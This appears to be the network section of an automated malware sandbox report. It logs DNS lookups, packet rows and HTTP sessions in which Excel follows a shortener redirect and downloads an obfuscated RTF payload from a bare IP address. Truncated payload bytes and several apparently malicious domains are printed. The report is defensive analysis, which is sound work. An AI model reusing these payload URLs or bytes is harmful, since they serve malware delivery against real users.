                                May 28, 2024 09:30:56.148169041 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.148189068 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.148221016 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.148250103 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.151241064 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.151421070 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.151456118 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.151490927 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.151494026 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.151530981 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.151566029 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.151592016 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.151602030 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.151640892 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.151700020 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.171936989 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.188497066 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188530922 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188549042 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188565969 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188597918 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188632965 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188669920 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188724041 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.188724995 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.188736916 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188781977 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.188792944 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188827991 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188863039 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188890934 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.188915014 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188950062 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.188987017 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189013004 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.189022064 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189057112 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189091921 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189116955 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.189126015 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189184904 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.189456940 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189486980 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189522028 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189548016 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.189577103 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189610004 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189646959 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189649105 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.189677954 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.189733982 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.190148115 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.190181971 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.190217018 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.190247059 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.190251112 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.190289974 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.190346003 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.192316055 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.192369938 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.192406893 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.192426920 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.192444086 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.192478895 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.192507982 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193064928 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193150997 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193209887 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193211079 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193264008 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193317890 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193331003 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193371058 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193406105 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193424940 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193439960 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193475008 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193491936 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193510056 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193546057 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193568945 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193581104 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193615913 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193643093 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193650961 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193689108 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193708897 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193722963 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193758011 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193778038 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193794012 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193829060 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193857908 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193864107 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193901062 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193922043 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.193936110 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193980932 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.193994999 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.194016933 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194051981 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194082022 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.194436073 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194664955 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194716930 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194726944 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.194753885 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194788933 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194811106 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.194824934 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194864988 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194892883 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.194905043 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194937944 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.194972038 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.195005894 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.195007086 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.195041895 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.195076942 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.195097923 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.221481085 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227178097 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227251053 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227289915 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227332115 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227356911 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227394104 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227427006 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227427006 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227464914 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227497101 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227498055 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227535009 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227555990 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227572918 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227607965 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227641106 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227641106 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227674961 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227706909 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227709055 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227744102 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227775097 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227777004 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227812052 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227844954 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227848053 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227880001 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227916002 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227916002 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.227951050 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.227986097 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.228003025 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.228045940 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.228068113 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.228080988 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.228116035 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.228137016 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.228149891 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.228184938 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.228207111 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.228224039 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.228277922 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.230134964 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.240861893 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.240916967 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.240956068 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.240989923 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.241029978 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.241065025 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:30:56.241091967 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.241091967 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.241133928 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.266959906 CEST4917880192.168.2.2277.232.129.190
                                May 28, 2024 09:30:56.272106886 CEST804917877.232.129.190192.168.2.22
                                May 28, 2024 09:31:04.346374989 CEST4917980192.168.2.2277.232.129.190
                                May 28, 2024 09:31:04.351304054 CEST804917977.232.129.190192.168.2.22
                                May 28, 2024 09:31:04.351365089 CEST4917980192.168.2.2277.232.129.190
                                May 28, 2024 09:31:04.351541042 CEST4917980192.168.2.2277.232.129.190
                                May 28, 2024 09:31:04.351593018 CEST4917980192.168.2.2277.232.129.190
                                May 28, 2024 09:31:04.356395960 CEST804917977.232.129.190192.168.2.22
                                May 28, 2024 09:31:04.356549025 CEST804917977.232.129.190192.168.2.22
                                May 28, 2024 09:31:04.356602907 CEST804917977.232.129.190192.168.2.22
                                May 28, 2024 09:31:05.507857084 CEST804917977.232.129.190192.168.2.22
                                May 28, 2024 09:31:05.507920027 CEST804917977.232.129.190192.168.2.22
                                May 28, 2024 09:31:05.507950068 CEST804917977.232.129.190192.168.2.22
                                May 28, 2024 09:31:05.507970095 CEST4917980192.168.2.2277.232.129.190
                                May 28, 2024 09:31:05.508001089 CEST4917980192.168.2.2277.232.129.190
                                May 28, 2024 09:31:05.508052111 CEST4917980192.168.2.2277.232.129.190
                                May 28, 2024 09:31:05.513216972 CEST804917977.232.129.190192.168.2.22
                                TimestampSource PortDest PortSource IPDest IP
                                May 28, 2024 09:29:59.543477058 CEST5456253192.168.2.228.8.8.8
                                May 28, 2024 09:29:59.561039925 CEST53545628.8.8.8192.168.2.22
                                May 28, 2024 09:30:01.219451904 CEST5291753192.168.2.228.8.8.8
                                May 28, 2024 09:30:01.236579895 CEST53529178.8.8.8192.168.2.22
                                May 28, 2024 09:30:03.688579082 CEST6275153192.168.2.228.8.8.8
                                May 28, 2024 09:30:03.695890903 CEST53627518.8.8.8192.168.2.22
                                May 28, 2024 09:30:03.698044062 CEST5789353192.168.2.228.8.8.8
                                May 28, 2024 09:30:03.705202103 CEST53578938.8.8.8192.168.2.22
                                May 28, 2024 09:30:07.993736029 CEST5482153192.168.2.228.8.8.8
                                May 28, 2024 09:30:08.009563923 CEST53548218.8.8.8192.168.2.22
                                May 28, 2024 09:30:08.011132002 CEST5471953192.168.2.228.8.8.8
                                May 28, 2024 09:30:08.026290894 CEST53547198.8.8.8192.168.2.22
                                May 28, 2024 09:30:12.357655048 CEST4988153192.168.2.228.8.8.8
                                May 28, 2024 09:30:12.369200945 CEST53498818.8.8.8192.168.2.22
                                May 28, 2024 09:30:16.741627932 CEST5499853192.168.2.228.8.8.8
                                May 28, 2024 09:30:16.755225897 CEST53549988.8.8.8192.168.2.22
                                May 28, 2024 09:30:54.443521023 CEST5278153192.168.2.228.8.8.8
                                May 28, 2024 09:30:54.562019110 CEST53527818.8.8.8192.168.2.22
                                May 28, 2024 09:30:54.566803932 CEST6392653192.168.2.228.8.8.8
                                May 28, 2024 09:30:54.664140940 CEST53639268.8.8.8192.168.2.22
                                May 28, 2024 09:31:04.136754036 CEST6551053192.168.2.228.8.8.8
                                May 28, 2024 09:31:04.235174894 CEST53655108.8.8.8192.168.2.22
                                May 28, 2024 09:31:04.338527918 CEST6267253192.168.2.228.8.8.8
                                May 28, 2024 09:31:04.345844984 CEST53626728.8.8.8192.168.2.22
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                May 28, 2024 09:29:59.543477058 CEST192.168.2.228.8.8.80xd5b5Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:01.219451904 CEST192.168.2.228.8.8.80xeee1Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:03.688579082 CEST192.168.2.228.8.8.80x831dStandard query (0)z2.inkA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:03.698044062 CEST192.168.2.228.8.8.80x619dStandard query (0)z2.inkA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:07.993736029 CEST192.168.2.228.8.8.80x1100Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:08.011132002 CEST192.168.2.228.8.8.80x2664Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:12.357655048 CEST192.168.2.228.8.8.80xb3eeStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:16.741627932 CEST192.168.2.228.8.8.80xec76Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:54.443521023 CEST192.168.2.228.8.8.80xa59fStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                May 28, 2024 09:30:54.566803932 CEST192.168.2.228.8.8.80x575cStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                May 28, 2024 09:31:04.136754036 CEST192.168.2.228.8.8.80xcbb4Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                May 28, 2024 09:31:04.338527918 CEST192.168.2.228.8.8.80x2571Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 28, 2024 09:29:59.561039925 CEST8.8.8.8192.168.2.220xd5b5No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:01.236579895 CEST8.8.8.8192.168.2.220xeee1No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:03.695890903 CEST8.8.8.8192.168.2.220x831dNo error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:03.705202103 CEST8.8.8.8192.168.2.220x619dNo error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:08.009563923 CEST8.8.8.8192.168.2.220x1100No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:08.026290894 CEST8.8.8.8192.168.2.220x2664No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:12.369200945 CEST8.8.8.8192.168.2.220xb3eeNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:12.369200945 CEST8.8.8.8192.168.2.220xb3eeNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:16.755225897 CEST8.8.8.8192.168.2.220xec76No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:16.755225897 CEST8.8.8.8192.168.2.220xec76No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:54.562019110 CEST8.8.8.8192.168.2.220xa59fNo error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false
                                May 28, 2024 09:30:54.664140940 CEST8.8.8.8192.168.2.220x575cNo error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false
                                May 28, 2024 09:31:04.235174894 CEST8.8.8.8192.168.2.220xcbb4No error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false
                                May 28, 2024 09:31:04.345844984 CEST8.8.8.8192.168.2.220x2571No error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false
                                • paste.ee
                                • uploaddeimagens.com.br
                                • z2.ink
                                • 198.46.177.156
                                • mbhaudjprbp.net
                                  • prolinice.ga
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.224916354.241.153.192801440C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:29:59.572971106 CEST317OUTGET /zBOD HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: z2.ink
                                Connection: Keep-Alive
                                May 28, 2024 09:30:00.161787987 CEST583INHTTP/1.1 301 Moved Permanently
                                Content-Type: text/html; charset=utf-8
                                Edge: smart-1.high-performance.network
                                Location: http://198.46.177.156/xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
                                Date: Tue, 28 May 2024 07:29:59 GMT
                                Content-Length: 89
                                Content-Encoding: gzip
                                Vary: Accept-Encoding
                                Server: LINKSGPT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Connection: keep-alive
                                Data Raw: 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 0b c9 c8 2c 56 08 48 4c 4f 55 f0 48 2c 4b 55 f0 cd 2f 4b 4d b1 d1 87 c8 d9 e8 83 55 72 d9 24 e5 a7 54 82 f4 19 e2 50 0e 94 e0 b2 d1 87 aa d2 07 db 02 00 30 39 f0 91 6c 00 00 00
                                Data Ascii: (HML),I,VHLOUH,KU/KMUr$TP09l


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.2249164198.46.177.156801440C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:00.184068918 CEST469OUTGET /xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 198.46.177.156
                                Connection: Keep-Alive
                                May 28, 2024 09:30:00.678623915 CEST1236INHTTP/1.1 200 OK
                                Date: Tue, 28 May 2024 07:30:00 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                Last-Modified: Sun, 26 May 2024 17:21:51 GMT
                                ETag: "a32e-6195ea2ebcde8"
                                Accept-Ranges: bytes
                                Content-Length: 41774
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/msword
                                Data Raw: 7b 5c 72 74 0d 0d 09 7b 5c 2a 5c 66 52 69 67 68 74 4c 69 6e 65 2e 2e 2e 33 39 39 39 35 38 30 36 39 20 5c 2f 7d 0d 7b 5c 34 30 39 31 32 34 36 36 38 26 5d 2f 33 a7 b0 60 2b 35 36 3f 3f 5e 3f 32 29 34 2f 5f 7e 36 21 2c 3f 5f 26 31 2f 26 36 5d 3d a7 b5 39 3a 33 5d 38 2a 2f 7c 2e 3c 60 26 b0 3a 23 28 b0 34 31 a7 5f 2b 37 25 33 35 32 7c 31 29 34 3f 34 5e 5f 40 2e 3c 7e b5 2e 60 2a 25 40 32 2f 25 3f 34 2b 26 36 25 39 a7 b5 3f 3f 7e 32 3a 3f 30 3f 21 2a 33 33 2e 24 30 60 21 38 38 5d 3f 33 30 a7 21 3f 3f 3c 5b 3f 25 24 28 24 3c 3f 33 2c 3f 2f b0 25 21 2f 34 32 35 3f 30 25 29 39 2d 25 40 2f 31 31 7e 3f 3f 36 30 25 31 34 2a 38 2e 2d 39 24 3f 23 3f 34 b0 5e 30 2d 36 5d 37 32 3f 39 40 33 31 37 2a 24 7c 5b 33 2d 29 3a 33 3f 60 35 37 b0 b5 21 a7 26 3c 2d a7 b5 38 2f 40 31 35 5d 5f 7c 2d 2b b0 38 38 3f 33 24 3f 3b 35 3f 2f 2d 2c 30 29 60 2a 2c b5 2b 40 31 21 21 3c 26 26 33 25 28 28 32 31 7e 36 25 3a 37 3f 2d 3f 3f 28 b5 23 21 b5 35 5f 24 a7 2f 24 26 24 29 a7 3e 7e 25 28 2b 3b 3f 28 7c a7 2f 60 27 30 29 36 7e 60 27 [TRUNCATED]
                                Data Ascii: {\rt{\*\fRightLine...399958069 \/}{\409124668&]/3`+56??^?2)4/_~6!,?_&1/&6]=9:3]8*/|.<`&:#(41_+7%352|1)4?4^_@.<~.`*%@2/%?4+&6%9??~2:?0?!*33.$0`!88]?30!??<[?%$($<?3,?/%!/425?0%)9-%@/11~??60%14*8.-9$?#?4^0-6]72?9@317*$|[3-):3?`57!&<-8/@15]_|-+88?3$?;5?/-,0)`*,+@1!!<&&3%((21~6%:7?-??(#!5_$/$&$)>~%(+;?(|/`'0)6~`'%3*`.,%#==.'[?!?50:%$,|$=&`??%8)532%9^~^*?#?64:3|-^%#71.7$?_??@)9?=181$<*;$/7,?-%28]=~0408!][/8?22)[?;)|-)1*_+4.@`(+?+#>=]:%4+0!!$*6;?3)1+?&)2)2][#:13?<1?0$?+79/%8''~.1!>@-|^&3':??~?0?)9*@1#&(~68*(@05;;:4~?^@#)'5][)#,6/'@[|6)!%,_>:@~%,$`?%|(*2@3:%414^%^./#>!%`$&_:9!#+;?*',63'*?`&?-:>_<?+='?*2=59:[%0..?*|[/.47?+,(%`)19.97'),_@?_%_$/?+>,]7]+=7/.?#:[*07;1^2]2[46#%;8?0`?/??(,?]7]?|6<;%;<-~]&$%0*')^+;24[+[;53/@8_?|?5_?4%_).92~@-3,'!9)57?>-^@1+5<][6<!&22?*2_16/1|>^;%;%@8#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;~$>93!+.-!?'17?_/*?8.1???(%+?
                                May 28, 2024 09:30:00.678689957 CEST224INData Raw: 3f 7c 3e 3c 2c 38 31 40 36 31 3c 7e 21 3f b5 2f 27 5d 7e 5e 37 34 38 35 3e 24 28 29 a7 2d 3f 3c 34 5e 2e b0 29 33 3a 2e 32 2e b5 29 26 34 38 2f 29 3f 3e 3b b5 2c 21 29 37 27 27 3f b0 27 5d 36 b5 39 34 3b 2b 21 2d 3f 3f 39 24 28 a7 39 3f 2e 7c b5
                                Data Ascii: ?|><,81@61<~!?/']~^7485>$()-?<4^.)3:.2.)&48/)?>;,!)7''?']694;+!-??9$(9?.|11=?,!),+<:+]6?~+.7)`^[^9!-3),!?>?[|%|.)@&%%9=?=:5[0!3#%?^!@|9#@?(0'>[(0--*'~(??!*`6?>~%?(-|&_3765+8?%:#|-??+.%+<9)>??_5:/1(='%$?]?|&<
                                May 28, 2024 09:30:00.678725958 CEST1236INData Raw: 30 7e 5b 28 b5 3f 7c 3d b5 a7 3f 3f 25 2d 37 5d 25 37 2f 3c 3f b5 30 36 3f 25 a7 24 2f 39 2f 3f 3a 5d 40 3f 7e 2d 2c 27 27 21 2f 24 31 3f 2f 3a 35 7c 5b 21 3f 3a 34 3e 60 7c 3f 31 2e 38 3f 34 3a 2d 5d 7c 2c 28 29 2c 3f 7c 3e 2e 33 3f 38 24 40 38
                                Data Ascii: 0~[(?|=??%-7]%7/<?06?%$/9/?:]@?~-,''!/$1?/:5|[!?:4>`|?1.8?4:-]|,(),?|>.3?8$@88?<-8.0'<??>~)#']_%0*?:)=>*,#2^98!4|+/#?_?*$+?()#^48.?9%?7@;9???+~*0+#?>15#,$?_!3'%2>>((%-%>[|:,%6=)|%::3^^(2@7-32/.|?0&60%25+$%@^690]??^$?$#/428^3*`6!??2
                                May 28, 2024 09:30:00.678761005 CEST1236INData Raw: 0a 0d 0a 0a 0d 0a 30 0a 0d 0d 0d 0d 0a 0d 0a 30 30 20 09 09 09 09 20 20 20 20 20 09 09 20 09 09 09 09 09 20 09 09 09 20 30 30 30 36 35 35 31 20 09 09 09 09 20 20 20 20 20 09 09 20 09 09 09 09 09 20 09 09 09 20 35 09 09 20 09 09 20 09 09 09 09 20
                                Data Ascii: 000 0006551 5 561546 94f6 e2e33000 000000
